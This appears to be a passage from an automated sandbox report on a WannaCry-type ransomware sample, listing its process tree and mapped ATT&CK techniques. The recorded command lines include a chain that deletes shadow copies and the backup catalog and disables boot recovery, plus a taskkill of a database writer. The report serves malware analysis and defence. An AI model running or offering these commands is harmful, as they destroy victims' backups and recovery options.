      - Suspicious use of AdjustPrivilegeToken
    [PID 2364] C:\Windows\SysWOW64\taskkill.exe
      cmdline: taskkill /f /im sqlwriter.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    [PID 2960] C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      cmdline: !WannaDecryptor!.exe c
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    [PID 4724] C:\Windows\SysWOW64\cmd.exe
      cmdline: cmd.exe /c start /b !WannaDecryptor!.exe v
      [PID 4768] C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
        cmdline: !WannaDecryptor!.exe v
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        [PID 632] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          [PID 780] C:\Windows\SysWOW64\Wbem\WMIC.exe
            cmdline: wmic shadowcopy delete
            - Suspicious use of AdjustPrivilegeToken
    [PID 2212] C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      cmdline: !WannaDecryptor!.exe
      - Executes dropped EXE
      - Sets desktop wallpaper using registry
      - Suspicious use of SetWindowsHookEx
[PID 4536] C:\Users\Admin\AppData\Local\Temp\java.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\java.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
[PID 2692] C:\Windows\System32\CompPkgSrv.exe
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding
[PID 2300] C:\Windows\System32\CompPkgSrv.exe
  cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding
-
C:\Users\Admin\AppData\Local\Temp\java.exeC:\Users\Admin\AppData\Local\Temp\java.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1896
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)

Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Downloads